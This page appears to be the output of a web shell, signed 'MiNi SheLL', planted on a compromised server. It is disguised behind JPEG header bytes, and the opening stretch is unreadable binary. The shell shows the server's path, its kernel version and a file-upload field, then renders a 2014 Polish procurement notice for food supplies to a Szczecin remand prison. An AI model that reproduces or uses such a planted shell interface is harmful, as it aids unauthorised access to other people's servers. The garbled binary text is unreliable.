JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140115/16658-N-2014.html

<p class="kh_header"><b>Szczecin: Dostawa przypraw, mleka w proszku i tłuszczów roślinnych do Aresztu Śledczego w Szczecinie.</b><br>
<b>Numer ogłoszenia: 16658 - 2014; data zamieszczenia: 15.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kaszubska 28, 70-952 Szczecin, woj. zachodniopomorskie, tel. 91 4809100, 4809151, 52, faks 91 4809260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa przypraw, mleka w proszku i tłuszczów roślinnych do Aresztu Śledczego w Szczecinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet I:
 Tłuszcze roślinne:
-tłuszcz roślinny do smarowania pieczywa kostka 250g - 11500 kg, CPV - 15412200-1, PN-/A/-86901,
-olej roślinny  butelka - 1200 l, CPV - 15411100-3, PN-/A/-86908.

Pakiet II:
- mleko w proszku odtłuszczone  - 1000 kg, CPV 15511700-0, PN-A-86024/A1:1996.
Pakiet III:
  Przyprawy, zupy i sosy w proszku, wyroby sojowe, suchary, woda mineralna, przetwory owocowo-warzywne:
- przyprawa uniwersalna typu kucharek - 60kg, CPV 15871270-7, PN-EN 13188;
- bazylia - 4kg, CPV 15872000-1, PN-A-86960;
- cynamon - 15kg, CPV 15872000-1, BN-68/8132-09;
- czosnek granulowany - 40kg, CPV 15871000-4, PN-A-86967;
- koper suszony - 10kg, CPV 15871000-4, PN-A-86967;
- kwasek cytrynowy - 30kg, CPV 15890000-3, PN-81/A-79734;
- liść laurowy - 15kg, CPV 15871000-4, PN-R-87022;
- majeranek - 50kg, CPV 15872000-1, PN-A-86958;
- musztarda - 250kg, CPV 15871250-1, PN-A-86964;
- chrzan słoik - 80kg, CPV 15331400-1, PN/R-75520;
- ocet - 100l, CPV 15871120-1, PN-72/A-79733;
- curry - 5kg, CPV 15871200-6, PN-R-87022;
- pieprz czarny mielony - 70kg, CPV 15872100-2, PN-A-86965;
- papryka mielona ostra - 70kg, CPV 15871000-4, PN-A-86955;
- sól kamienna - 1300kg, CPV 15872400-5, PN-C-84081-2;
- herbata granulowana - 400kg, CPV 15863000-5, PN-ISO 3720;
- przyprawa do zup w płynie - 2200l, CPV 15890000-3, PN-A-94052;
- oregano - 7kg, CPV 15872000-1, PN-A-86960;
- rosół drobiowy w proszku baza - 80kg, CPV 15891400-4, PN-A-97052;
- żurek w proszku baza - 70kg, CPV 15891400-4, PN-A-94050;
- sos pieczarkowy w proszku - 70kg, CPV 15871260-4, PN-A-86951;
- sos pieczeniowy ciemny w proszku - 40kg, CPV 15871260-4, PN-A-86951;
- zupa ogonowa w proszku - 40kg, 15891400-4, PN-A-94050;
- soja granulat- 250kg, CPV 15890000-3, PN-ISO 5506;
- soja kostka 06 - 400kg, CPV 15890000-3, PN-ISO 5506;
- kotlety sojowe schabowe - 60kg, CPV 15890000-3, PN-ISO 5506;
- sucharki bezcukrowe  - 10kg, CPV 15821150-5, PN-A-88106:1998;
-ketchup - 80kg, CPV 15871230-5, PN-A-82013:1996; 
-majonez - 80kg, CPV 15871273-8, PN-A-86950:1995;
- woda mineralna niegazowana but. 1,5l - 10500l, CPV 15981000-8, PN-Z-11001-2
- dżem wieloowocowy- 2000kg, CPV 15332290-3, PN-A-75100;
- koncentrat pomidorowy 30%  - 1800kg, CPV 15331427-6, PN-75/A-77601;
-szczaw słoik konserwowy - 120kg, CPV 15332170-6, PN-A-77807:1997. 
Powyższe zestawienie oznacza kolejno: przedmiot zamówienia, zapotrzebowanie ilościowe, kod CPV wg Wspólnego Słownika Zamówień, polską normę.
Wszystkie w/w produkty muszą spełniać normy co do jakości jakie wynikają z obowiązujących przepisów polskiego prawa dla produktów żywnościowych. W czasie obowiązywania umowy podane ilości mogą ulec pomniejszeniu do 20% w zależności od ilości osadzonych w jednostce oraz wysokości stawki żywieniowej przypadającej na jednego osadzonego. Dostawcy będzie przysługiwało prawo do wynagrodzenia wyłącznie za faktycznie dostarczone ilości towaru. Oznacza to, że ostateczny rozmiar zamówienia nie może stanowić podstaw do zgłaszania roszczeń z tytułu niezrealizowanych dostaw albo podstawy do odmowy realizacji dostaw..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.41.22.00-1, 15.51.17.00-0, 15.87.12.70-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie art. 22 - złożono / nie złożono</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie art. 22 - złożono / nie złożono</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie art. 22 - złożono / nie złożono</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie art. 22 - złożono / nie złożono</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie art. 22 - złożono / nie złożono</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany obowiązujących przepisów w zakresie podatku od towarów i usług - w przypadku zmiany wartości podatku VAT legnie zmianie cena brutto o zmienioną wartość podatku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziby zamawiającego
Areszt śledczy
ul. Kaszubska 28
70-952 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2014 godzina 10:00, miejsce: siedziba zamawiającego
Areszt śledczy
ul. Kaszubska 28
70-952 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa tłuszczów roślinnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tłuszcze roślinne:
-tłuszcz roślinny do smarowania pieczywa (kostka 250g) - 11500 kg, CPV - 15412200-1, PN-/A/-86901,
-olej roślinny  (butelka) - 1200 l, CPV - 15411100-3, PN-/A/-86908..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.22.00-1, 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka w proszku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - mleko w proszku odtłuszczone  - 1000 kg, CPV 15511700-0, PN-A-86024/A1:1996..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.17.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa przypraw..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyprawy, zupy i sosy w proszku, wyroby sojowe, suchary, woda mineralna, przetwory owocowo-warzywne:
- przyprawa uniwersalna typu kucharek - 60kg, CPV 15871270-7, PN-EN 13188;
- bazylia - 4kg, CPV 15872000-1, PN-A-86960;
- cynamon - 15kg, CPV 15872000-1, BN-68/8132-09;
- czosnek granulowany - 40kg, CPV 15871000-4, PN-A-86967;
- koper suszony - 10kg, CPV 15871000-4, PN-A-86967;
- kwasek cytrynowy - 30kg, CPV 15890000-3, PN-81/A-79734;
- liść laurowy - 15kg, CPV 15871000-4, PN-R-87022;
- majeranek - 50kg, CPV 15872000-1, PN-A-86958;
- musztarda - 250kg, CPV 15871250-1, PN-A-86964;
- chrzan (słoik) - 80kg, CPV 15331400-1, PN/R-75520;
- ocet - 100l, CPV 15871120-1, PN-72/A-79733;
- curry - 5kg, CPV 15871200-6, PN-R-87022;
- pieprz czarny mielony - 70kg, CPV 15872100-2, PN-A-86965;
- papryka mielona ostra - 70kg, CPV 15871000-4, PN-A-86955;
- sól kamienna - 1300kg, CPV 15872400-5, PN-C-84081-2;
- herbata granulowana - 400kg, CPV 15863000-5, PN-ISO 3720;
- przyprawa do zup w płynie - 2200l, CPV 15890000-3, PN-A-94052;
- oregano - 7kg, CPV 15872000-1, PN-A-86960;
- rosół drobiowy w proszku (baza) - 80kg, CPV 15891400-4, PN-A-97052;
- żurek w proszku (baza) - 70kg, CPV 15891400-4, PN-A-94050;
- sos pieczarkowy w proszku - 70kg, CPV 15871260-4, PN-A-86951;
- sos pieczeniowy ciemny w proszku - 40kg, CPV 15871260-4, PN-A-86951;
- zupa ogonowa w proszku - 40kg, 15891400-4, PN-A-94050;
- soja (granulat)- 250kg, CPV 15890000-3, PN-ISO 5506;
- soja (kostka 06) - 400kg, CPV 15890000-3, PN-ISO 5506;
- kotlety sojowe schabowe - 60kg, CPV 15890000-3, PN-ISO 5506;
- sucharki bezcukrowe  - 10kg, CPV 15821150-5, PN-A-88106:1998;
-ketchup - 80kg, CPV 15871230-5, PN-A-82013:1996; 
-majonez - 80kg, CPV 15871273-8, PN-A-86950:1995;
- woda mineralna niegazowana (but. 1,5l) - 10500l, CPV 15981000-8, PN-Z-11001-2
- dżem wieloowocowy- 2000kg, CPV 15332290-3, PN-A-75100;
- koncentrat pomidorowy 30%  - 1800kg, CPV 15331427-6, PN-75/A-77601;
-szczaw (słoik) konserwowy - 120kg, CPV 15332170-6, PN-A-77807:1997..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.70-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com